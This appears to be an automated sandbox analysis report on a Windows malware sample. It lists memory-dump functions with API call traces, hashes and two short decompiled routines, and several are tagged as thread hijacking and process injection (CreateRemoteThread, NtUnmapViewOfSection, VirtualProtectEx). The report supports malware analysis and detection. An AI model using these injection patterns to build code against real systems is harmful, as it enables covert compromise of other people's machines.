Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

